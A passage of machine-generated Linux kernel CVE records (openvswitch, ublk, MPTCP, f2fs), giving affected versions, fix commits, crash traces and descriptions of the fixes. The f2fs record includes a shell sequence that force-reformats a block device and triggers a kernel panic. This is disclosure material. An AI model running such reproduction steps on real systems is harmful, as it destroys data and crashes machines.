"url": "https://git.kernel.org/stable/c/5ace7ef87f059d68b5f50837ef3e8a1a4870c36e"
}
],
"title": "net: openvswitch: fix middle attribute validation in push_nsh() action",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68785",
"datePublished": "2026-01-13T15:28:58.930Z",
"dateReserved": "2025-12-24T10:30:51.036Z",
"dateUpdated": "2026-01-19T12:19:02.370Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71070 (GCVE-0-2025-71070)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:31 – Updated: 2026-01-13 15:31
VLAI?
EPSS
Title
ublk: clean up user copy references on ublk server exit
Summary
In the Linux kernel, the following vulnerability has been resolved:
ublk: clean up user copy references on ublk server exit
If a ublk server process releases a ublk char device file, any requests
dispatched to the ublk server but not yet completed will retain a ref
value of UBLK_REFCOUNT_INIT. Before commit e63d2228ef83 ("ublk: simplify
aborting ublk request"), __ublk_fail_req() would decrement the reference
count before completing the failed request. However, that commit
optimized __ublk_fail_req() to call __ublk_complete_rq() directly
without decrementing the request reference count.
The leaked reference count incorrectly allows user copy and zero copy
operations on the completed ublk request. It also triggers the
WARN_ON_ONCE(refcount_read(&io->ref)) warnings in ublk_queue_reinit()
and ublk_deinit_queue().
Commit c5c5eb24ed61 ("ublk: avoid ublk_io_release() called after ublk
char dev is closed") already fixed the issue for ublk devices using
UBLK_F_SUPPORT_ZERO_COPY or UBLK_F_AUTO_BUF_REG. However, the reference
count leak also affects UBLK_F_USER_COPY, the other reference-counted
data copy mode. Fix the condition in ublk_check_and_reset_active_ref()
to include all reference-counted data copy modes. This ensures that any
ublk requests still owned by the ublk server when it exits have their
reference counts reset to 0.
Severity ?
No CVSS data available.
Assigner
References
Impacted products
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/block/ublk_drv.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "13456b4f1033d911f8bf3a0a1195656f293ba0f6",
"status": "affected",
"version": "e63d2228ef831af36f963b3ab8604160cfff84c1",
"versionType": "git"
},
{
"lessThan": "daa24603d9f0808929514ee62ced30052ca7221c",
"status": "affected",
"version": "e63d2228ef831af36f963b3ab8604160cfff84c1",
"versionType": "git"
},
{
"status": "affected",
"version": "e537193fc4a43b48ac51cc6366319e15e32dd540",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/block/ublk_drv.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.15"
},
{
"lessThan": "6.15",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc3",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "6.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc3",
"versionStartIncluding": "6.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.14.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nublk: clean up user copy references on ublk server exit\n\nIf a ublk server process releases a ublk char device file, any requests\ndispatched to the ublk server but not yet completed will retain a ref\nvalue of UBLK_REFCOUNT_INIT. Before commit e63d2228ef83 (\"ublk: simplify\naborting ublk request\"), __ublk_fail_req() would decrement the reference\ncount before completing the failed request. However, that commit\noptimized __ublk_fail_req() to call __ublk_complete_rq() directly\nwithout decrementing the request reference count.\nThe leaked reference count incorrectly allows user copy and zero copy\noperations on the completed ublk request. It also triggers the\nWARN_ON_ONCE(refcount_read(\u0026io-\u003eref)) warnings in ublk_queue_reinit()\nand ublk_deinit_queue().\nCommit c5c5eb24ed61 (\"ublk: avoid ublk_io_release() called after ublk\nchar dev is closed\") already fixed the issue for ublk devices using\nUBLK_F_SUPPORT_ZERO_COPY or UBLK_F_AUTO_BUF_REG. However, the reference\ncount leak also affects UBLK_F_USER_COPY, the other reference-counted\ndata copy mode. Fix the condition in ublk_check_and_reset_active_ref()\nto include all reference-counted data copy modes. This ensures that any\nublk requests still owned by the ublk server when it exits have their\nreference counts reset to 0."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:31:24.709Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/13456b4f1033d911f8bf3a0a1195656f293ba0f6"
},
{
"url": "https://git.kernel.org/stable/c/daa24603d9f0808929514ee62ced30052ca7221c"
}
],
"title": "ublk: clean up user copy references on ublk server exit",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71070",
"datePublished": "2026-01-13T15:31:24.709Z",
"dateReserved": "2026-01-13T15:30:19.647Z",
"dateUpdated": "2026-01-13T15:31:24.709Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71088 (GCVE-0-2025-71088)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:34 – Updated: 2026-01-13 15:34
VLAI?
EPSS
Title
mptcp: fallback earlier on simult connection
Summary
In the Linux kernel, the following vulnerability has been resolved:
mptcp: fallback earlier on simult connection
Syzkaller reports a simult-connect race leading to inconsistent fallback
status:
WARNING: CPU: 3 PID: 33 at net/mptcp/subflow.c:1515 subflow_data_ready+0x40b/0x7c0 net/mptcp/subflow.c:1515
Modules linked in:
CPU: 3 UID: 0 PID: 33 Comm: ksoftirqd/3 Not tainted syzkaller #0 PREEMPT(full)
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014
RIP: 0010:subflow_data_ready+0x40b/0x7c0 net/mptcp/subflow.c:1515
Code: 89 ee e8 78 61 3c f6 40 84 ed 75 21 e8 8e 66 3c f6 44 89 fe bf 07 00 00 00 e8 c1 61 3c f6 41 83 ff 07 74 09 e8 76 66 3c f6 90 <0f> 0b 90 e8 6d 66 3c f6 48 89 df e8 e5 ad ff ff 31 ff 89 c5 89 c6
RSP: 0018:ffffc900006cf338 EFLAGS: 00010246
RAX: 0000000000000000 RBX: ffff888031acd100 RCX: ffffffff8b7f2abf
RDX: ffff88801e6ea440 RSI: ffffffff8b7f2aca RDI: 0000000000000005
RBP: 0000000000000000 R08: 0000000000000005 R09: 0000000000000007
R10: 0000000000000004 R11: 0000000000002c10 R12: ffff88802ba69900
R13: 1ffff920000d9e67 R14: ffff888046f81800 R15: 0000000000000004
FS: 0000000000000000(0000) GS:ffff8880d69bc000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000560fc0ca1670 CR3: 0000000032c3a000 CR4: 0000000000352ef0
Call Trace:
<TASK>
tcp_data_queue+0x13b0/0x4f90 net/ipv4/tcp_input.c:5197
tcp_rcv_state_process+0xfdf/0x4ec0 net/ipv4/tcp_input.c:6922
tcp_v6_do_rcv+0x492/0x1740 net/ipv6/tcp_ipv6.c:1672
tcp_v6_rcv+0x2976/0x41e0 net/ipv6/tcp_ipv6.c:1918
ip6_protocol_deliver_rcu+0x188/0x1520 net/ipv6/ip6_input.c:438
ip6_input_finish+0x1e4/0x4b0 net/ipv6/ip6_input.c:489
NF_HOOK include/linux/netfilter.h:318 [inline]
NF_HOOK include/linux/netfilter.h:312 [inline]
ip6_input+0x105/0x2f0 net/ipv6/ip6_input.c:500
dst_input include/net/dst.h:471 [inline]
ip6_rcv_finish net/ipv6/ip6_input.c:79 [inline]
NF_HOOK include/linux/netfilter.h:318 [inline]
NF_HOOK include/linux/netfilter.h:312 [inline]
ipv6_rcv+0x264/0x650 net/ipv6/ip6_input.c:311
__netif_receive_skb_one_core+0x12d/0x1e0 net/core/dev.c:5979
__netif_receive_skb+0x1d/0x160 net/core/dev.c:6092
process_backlog+0x442/0x15e0 net/core/dev.c:6444
__napi_poll.constprop.0+0xba/0x550 net/core/dev.c:7494
napi_poll net/core/dev.c:7557 [inline]
net_rx_action+0xa9f/0xfe0 net/core/dev.c:7684
handle_softirqs+0x216/0x8e0 kernel/softirq.c:579
run_ksoftirqd kernel/softirq.c:968 [inline]
run_ksoftirqd+0x3a/0x60 kernel/softirq.c:960
smpboot_thread_fn+0x3f7/0xae0 kernel/smpboot.c:160
kthread+0x3c2/0x780 kernel/kthread.c:463
ret_from_fork+0x5d7/0x6f0 arch/x86/kernel/process.c:148
ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245
</TASK>
The TCP subflow can process the simult-connect syn-ack packet after
transitioning to TCP_FIN1 state, bypassing the MPTCP fallback check,
as the sk_state_change() callback is not invoked for * -> FIN_WAIT1
transitions.
That will move the msk socket to an inconsistent status and the next
incoming data will hit the reported splat.
Close the race moving the simult-fallback check at the earliest possible
stage - that is at syn-ack generation time.
About the fixes tags: [2] was supposed to also fix this issue introduced
by [3]. [1] is required as a dependence: it was not explicitly marked as
a fix, but it is one and it has already been backported before [3]. In
other words, this commit should be backported up to [3], including [2]
and [1] if that's not already there.
Severity ?
No CVSS data available.
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Affected:
01b7822700f2256900089e00390e119e1ad545df , < b5f46a08269265e2f5e87d855287d6d22de0a32b
(git)
Affected: 1e777f39b4d75e599a3aac8e0f67d739474f198c , < c9bf315228287653522894df9d851e9b43db9516 (git) Affected: 1e777f39b4d75e599a3aac8e0f67d739474f198c , < 79f80a7a47849ef1b3c25a0bedcc448b9cb551c1 (git) Affected: 1e777f39b4d75e599a3aac8e0f67d739474f198c , < 25f1ae942c097b7ae4ce5c2b9c6fefb8e3672b86 (git) Affected: 1e777f39b4d75e599a3aac8e0f67d739474f198c , < 71154bbe49423128c1c8577b6576de1ed6836830 (git) |
||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/mptcp/options.c",
"net/mptcp/protocol.h",
"net/mptcp/subflow.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "b5f46a08269265e2f5e87d855287d6d22de0a32b",
"status": "affected",
"version": "01b7822700f2256900089e00390e119e1ad545df",
"versionType": "git"
},
{
"lessThan": "c9bf315228287653522894df9d851e9b43db9516",
"status": "affected",
"version": "1e777f39b4d75e599a3aac8e0f67d739474f198c",
"versionType": "git"
},
{
"lessThan": "79f80a7a47849ef1b3c25a0bedcc448b9cb551c1",
"status": "affected",
"version": "1e777f39b4d75e599a3aac8e0f67d739474f198c",
"versionType": "git"
},
{
"lessThan": "25f1ae942c097b7ae4ce5c2b9c6fefb8e3672b86",
"status": "affected",
"version": "1e777f39b4d75e599a3aac8e0f67d739474f198c",
"versionType": "git"
},
{
"lessThan": "71154bbe49423128c1c8577b6576de1ed6836830",
"status": "affected",
"version": "1e777f39b4d75e599a3aac8e0f67d739474f198c",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/mptcp/options.c",
"net/mptcp/protocol.h",
"net/mptcp/subflow.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.2"
},
{
"lessThan": "6.2",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.65",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc4",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "6.1.110",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "6.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.65",
"versionStartIncluding": "6.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.4",
"versionStartIncluding": "6.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc4",
"versionStartIncluding": "6.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: fallback earlier on simult connection\n\nSyzkaller reports a simult-connect race leading to inconsistent fallback\nstatus:\n\n WARNING: CPU: 3 PID: 33 at net/mptcp/subflow.c:1515 subflow_data_ready+0x40b/0x7c0 net/mptcp/subflow.c:1515\n Modules linked in:\n CPU: 3 UID: 0 PID: 33 Comm: ksoftirqd/3 Not tainted syzkaller #0 PREEMPT(full)\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014\n RIP: 0010:subflow_data_ready+0x40b/0x7c0 net/mptcp/subflow.c:1515\n Code: 89 ee e8 78 61 3c f6 40 84 ed 75 21 e8 8e 66 3c f6 44 89 fe bf 07 00 00 00 e8 c1 61 3c f6 41 83 ff 07 74 09 e8 76 66 3c f6 90 \u003c0f\u003e 0b 90 e8 6d 66 3c f6 48 89 df e8 e5 ad ff ff 31 ff 89 c5 89 c6\n RSP: 0018:ffffc900006cf338 EFLAGS: 00010246\n RAX: 0000000000000000 RBX: ffff888031acd100 RCX: ffffffff8b7f2abf\n RDX: ffff88801e6ea440 RSI: ffffffff8b7f2aca RDI: 0000000000000005\n RBP: 0000000000000000 R08: 0000000000000005 R09: 0000000000000007\n R10: 0000000000000004 R11: 0000000000002c10 R12: ffff88802ba69900\n R13: 1ffff920000d9e67 R14: ffff888046f81800 R15: 0000000000000004\n FS: 0000000000000000(0000) GS:ffff8880d69bc000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 0000560fc0ca1670 CR3: 0000000032c3a000 CR4: 0000000000352ef0\n Call Trace:\n \u003cTASK\u003e\n tcp_data_queue+0x13b0/0x4f90 net/ipv4/tcp_input.c:5197\n tcp_rcv_state_process+0xfdf/0x4ec0 net/ipv4/tcp_input.c:6922\n tcp_v6_do_rcv+0x492/0x1740 net/ipv6/tcp_ipv6.c:1672\n tcp_v6_rcv+0x2976/0x41e0 net/ipv6/tcp_ipv6.c:1918\n ip6_protocol_deliver_rcu+0x188/0x1520 net/ipv6/ip6_input.c:438\n ip6_input_finish+0x1e4/0x4b0 net/ipv6/ip6_input.c:489\n NF_HOOK include/linux/netfilter.h:318 [inline]\n NF_HOOK include/linux/netfilter.h:312 [inline]\n ip6_input+0x105/0x2f0 net/ipv6/ip6_input.c:500\n dst_input include/net/dst.h:471 [inline]\n ip6_rcv_finish net/ipv6/ip6_input.c:79 [inline]\n NF_HOOK include/linux/netfilter.h:318 [inline]\n NF_HOOK include/linux/netfilter.h:312 [inline]\n ipv6_rcv+0x264/0x650 net/ipv6/ip6_input.c:311\n __netif_receive_skb_one_core+0x12d/0x1e0 net/core/dev.c:5979\n __netif_receive_skb+0x1d/0x160 net/core/dev.c:6092\n process_backlog+0x442/0x15e0 net/core/dev.c:6444\n __napi_poll.constprop.0+0xba/0x550 net/core/dev.c:7494\n napi_poll net/core/dev.c:7557 [inline]\n net_rx_action+0xa9f/0xfe0 net/core/dev.c:7684\n handle_softirqs+0x216/0x8e0 kernel/softirq.c:579\n run_ksoftirqd kernel/softirq.c:968 [inline]\n run_ksoftirqd+0x3a/0x60 kernel/softirq.c:960\n smpboot_thread_fn+0x3f7/0xae0 kernel/smpboot.c:160\n kthread+0x3c2/0x780 kernel/kthread.c:463\n ret_from_fork+0x5d7/0x6f0 arch/x86/kernel/process.c:148\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245\n \u003c/TASK\u003e\n\nThe TCP subflow can process the simult-connect syn-ack packet after\ntransitioning to TCP_FIN1 state, bypassing the MPTCP fallback check,\nas the sk_state_change() callback is not invoked for * -\u003e FIN_WAIT1\ntransitions.\n\nThat will move the msk socket to an inconsistent status and the next\nincoming data will hit the reported splat.\n\nClose the race moving the simult-fallback check at the earliest possible\nstage - that is at syn-ack generation time.\n\nAbout the fixes tags: [2] was supposed to also fix this issue introduced\nby [3]. [1] is required as a dependence: it was not explicitly marked as\na fix, but it is one and it has already been backported before [3]. In\nother words, this commit should be backported up to [3], including [2]\nand [1] if that\u0027s not already there."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:34:50.377Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/b5f46a08269265e2f5e87d855287d6d22de0a32b"
},
{
"url": "https://git.kernel.org/stable/c/c9bf315228287653522894df9d851e9b43db9516"
},
{
"url": "https://git.kernel.org/stable/c/79f80a7a47849ef1b3c25a0bedcc448b9cb551c1"
},
{
"url": "https://git.kernel.org/stable/c/25f1ae942c097b7ae4ce5c2b9c6fefb8e3672b86"
},
{
"url": "https://git.kernel.org/stable/c/71154bbe49423128c1c8577b6576de1ed6836830"
}
],
"title": "mptcp: fallback earlier on simult connection",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71088",
"datePublished": "2026-01-13T15:34:50.377Z",
"dateReserved": "2026-01-13T15:30:19.649Z",
"dateUpdated": "2026-01-13T15:34:50.377Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68769 (GCVE-0-2025-68769)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:28 – Updated: 2026-01-19 12:18
VLAI?
EPSS
Title
f2fs: fix return value of f2fs_recover_fsync_data()
Summary
In the Linux kernel, the following vulnerability has been resolved:
f2fs: fix return value of f2fs_recover_fsync_data()
With below scripts, it will trigger panic in f2fs:
mkfs.f2fs -f /dev/vdd
mount /dev/vdd /mnt/f2fs
touch /mnt/f2fs/foo
sync
echo 111 >> /mnt/f2fs/foo
f2fs_io fsync /mnt/f2fs/foo
f2fs_io shutdown 2 /mnt/f2fs
umount /mnt/f2fs
mount -o ro,norecovery /dev/vdd /mnt/f2fs
or
mount -o ro,disable_roll_forward /dev/vdd /mnt/f2fs
F2FS-fs (vdd): f2fs_recover_fsync_data: recovery fsync data, check_only: 0
F2FS-fs (vdd): Mounted with checkpoint version = 7f5c361f
F2FS-fs (vdd): Stopped filesystem due to reason: 0
F2FS-fs (vdd): f2fs_recover_fsync_data: recovery fsync data, check_only: 1
Filesystem f2fs get_tree() didn't set fc->root, returned 1
------------[ cut here ]------------
kernel BUG at fs/super.c:1761!
Oops: invalid opcode: 0000 [#1] SMP PTI
CPU: 3 UID: 0 PID: 722 Comm: mount Not tainted 6.18.0-rc2+ #721 PREEMPT(voluntary)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
RIP: 0010:vfs_get_tree.cold+0x18/0x1a
Call Trace:
<TASK>
fc_mount+0x13/0xa0
path_mount+0x34e/0xc50
__x64_sys_mount+0x121/0x150
do_syscall_64+0x84/0x800
entry_SYSCALL_64_after_hwframe+0x76/0x7e
RIP: 0033:0x7fa6cc126cfe
The root cause is we missed to handle error number returned from
f2fs_recover_fsync_data() when mounting image w/ ro,norecovery or
ro,disable_roll_forward mount option, result in returning a positive
error number to vfs_get_tree(), fix it.
Severity ?
No CVSS data available.
Assigner
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Linux | Linux |
Affected:
6781eabba1bdb133eb9125c4acf6704ccbe4df02 , < e6ac31abd30e9fd2ef5f0819ce7f3f932be3b725
(git)
Affected: 6781eabba1bdb133eb9125c4acf6704ccbe4df02 , < 0de4977a1eeafe9d77701e3c031a1bcdba389243 (git) Affected: 6781eabba1bdb133eb9125c4acf6704ccbe4df02 , < 9bc246018aaa3b46a7710428d0a2196c229f9d49 (git) Affected: 6781eabba1bdb133eb9125c4acf6704ccbe4df02 , < a4c67d96f92eefcfa5596a08f069e77b743c5865 (git) Affected: 6781eabba1bdb133eb9125c4acf6704ccbe4df02 , < 473550e715654ad7612aa490d583cb7c25fe2ff3 (git) Affected: 6781eabba1bdb133eb9125c4acf6704ccbe4df02 , < 4560db9678a2c5952b6205fbca468c6805c2ba2a (git) Affected: 6781eabba1bdb133eb9125c4acf6704ccbe4df02 , < 01fba45deaddcce0d0b01c411435d1acf6feab7b (git) Affected: 1499d39b74f5957e932639a86487ccea5a0a9740 (git) |
|||||||
|
|||||||||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/f2fs/super.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "e6ac31abd30e9fd2ef5f0819ce7f3f932be3b725",
"status": "affected",
"version": "6781eabba1bdb133eb9125c4acf6704ccbe4df02",
"versionType": "git"
},
{
"lessThan": "0de4977a1eeafe9d77701e3c031a1bcdba389243",
"status": "affected",
"version": "6781eabba1bdb133eb9125c4acf6704ccbe4df02",
"versionType": "git"
},
{
"lessThan": "9bc246018aaa3b46a7710428d0a2196c229f9d49",
"status": "affected",
"version": "6781eabba1bdb133eb9125c4acf6704ccbe4df02",
"versionType": "git"
},
{
"lessThan": "a4c67d96f92eefcfa5596a08f069e77b743c5865",
"status": "affected",
"version": "6781eabba1bdb133eb9125c4acf6704ccbe4df02",
"versionType": "git"
},
{
"lessThan": "473550e715654ad7612aa490d583cb7c25fe2ff3",
"status": "affected",
"version": "6781eabba1bdb133eb9125c4acf6704ccbe4df02",
"versionType": "git"
},
{
"lessThan": "4560db9678a2c5952b6205fbca468c6805c2ba2a",
"status": "affected",
"version": "6781eabba1bdb133eb9125c4acf6704ccbe4df02",
"versionType": "git"
},
{
"lessThan": "01fba45deaddcce0d0b01c411435d1acf6feab7b",
"status": "affected",
"version": "6781eabba1bdb133eb9125c4acf6704ccbe4df02",
"versionType": "git"
},
{
"status": "affected",
"version": "1499d39b74f5957e932639a86487ccea5a0a9740",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/f2fs/super.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.7"
},
{
"lessThan": "4.7",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.4.172",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nf2fs: fix return value of f2fs_recover_fsync_data()\n\nWith below scripts, it will trigger panic in f2fs:\n\nmkfs.f2fs -f /dev/vdd\nmount /dev/vdd /mnt/f2fs\ntouch /mnt/f2fs/foo\nsync\necho 111 \u003e\u003e /mnt/f2fs/foo\nf2fs_io fsync /mnt/f2fs/foo\nf2fs_io shutdown 2 /mnt/f2fs\numount /mnt/f2fs\nmount -o ro,norecovery /dev/vdd /mnt/f2fs\nor\nmount -o ro,disable_roll_forward /dev/vdd /mnt/f2fs\n\nF2FS-fs (vdd): f2fs_recover_fsync_data: recovery fsync data, check_only: 0\nF2FS-fs (vdd): Mounted with checkpoint version = 7f5c361f\nF2FS-fs (vdd): Stopped filesystem due to reason: 0\nF2FS-fs (vdd): f2fs_recover_fsync_data: recovery fsync data, check_only: 1\nFilesystem f2fs get_tree() didn\u0027t set fc-\u003eroot, returned 1\n------------[ cut here ]------------\nkernel BUG at fs/super.c:1761!\nOops: invalid opcode: 0000 [#1] SMP PTI\nCPU: 3 UID: 0 PID: 722 Comm: mount Not tainted 6.18.0-rc2+ #721 PREEMPT(voluntary)\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014\nRIP: 0010:vfs_get_tree.cold+0x18/0x1a\nCall Trace:\n \u003cTASK\u003e\n fc_mount+0x13/0xa0\n path_mount+0x34e/0xc50\n __x64_sys_mount+0x121/0x150\n do_syscall_64+0x84/0x800\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\nRIP: 0033:0x7fa6cc126cfe\n\nThe root cause is we missed to handle error number returned from\nf2fs_recover_fsync_data() when mounting image w/ ro,norecovery or\nro,disable_roll_forward mount option, result in returning a positive\nerror number to vfs_get_tree(), fix it."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:18:51.231Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/e6ac31abd30e9fd2ef5f0819ce7f3f932be3b725"
},
{
"url": "https://git.kernel.org/stable/c/0de4977a1eeafe9d77701e3c031a1bcdba389243"
},
{
"url": "https://git.kernel.org/stable/c/9bc246018aaa3b46a7710428d0a2196c229f9d49"
},
{
"url": "https://git.kernel.org/stable/c/a4c67d96f92eefcfa5596a08f069e77b743c5865"
},
{
"url": "https://git.kernel.org/stable/c/473550e715654ad7612aa490d583cb7c25fe2ff3"
},
{
"url": "https://git.kernel.org/stable/c/4560db9678a2c5952b6205fbca468c6805c2ba2a"
},
{
"url": "https://git.kernel.org/stable/c/01fba45deaddcce0d0b01c411435d1acf6feab7b"
}
],
"title": "f2fs: fix return value of f2fs_recover_fsync_data()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
